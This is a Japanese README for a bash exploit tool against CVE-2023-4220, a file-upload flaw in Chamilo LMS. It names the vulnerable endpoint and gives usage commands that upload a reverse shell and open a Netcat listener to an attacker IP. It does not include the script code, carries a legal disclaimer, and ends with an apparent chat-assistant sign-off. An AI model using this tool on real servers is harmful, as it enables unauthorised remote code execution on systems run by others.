
改修 Chamilo LMS CVE-2023-4220 エクスプロイト (bashで記述)
このスクリプトは Chamilo LMS バージョン ≤ v1.11.24 におけるリモートコード実行(RCE)脆弱性を悪用します。この脆弱性(CVE-2023-4220)は、Chamilo LMS の bigUpload.php 機能における無制限ファイルアップロードの不備に起因し、攻撃者が任意のファイル(Webシェルなど)をアップロード・実行することで、サーバ上での完全なリモートコード実行を可能にします。
本スクリプトは Divine Clown によって強化され、攻撃プロセスを効率化し、リバースシェルファイルの自動生成、ターゲットへのアップロード、リスナーの起動によるシェルへの直接アクセスを実現します。
/main/inc/lib/javascript/bigupload/inc/bigUpload.php における無制限ファイルアップロードbigUpload.php エンドポイントを使用してリバースシェルをアップロード。./CVE-2023-4220.sh -i <攻撃者_IP> -p <ポート> -h <ホストリンク>
-i <攻撃者_IP>: リバースシェル用の攻撃者の IP アドレス。-p <ポート>: Netcat リスナーを起動するポート。-h <ホストリンク>: 脆弱な Chamilo LMS インスタンスの完全な URL。./CVE-2023-4220.sh -i 10.10.14.15 -p 9001 -h http://target-site.com
このツールは教育目的および明示的に脆弱性を悪用する許可を得たテスト環境のみを対象としています。システムへの不正アクセスは違法であり、刑事罰の対象となる可能性があります。著者は、このスクリプトの誤用またはそれによって生じた損害について一切の責任を負いません。
README に追加情報や書式を含めたい場合は、自由に修正してください。他に必要なものがあればお知らせください。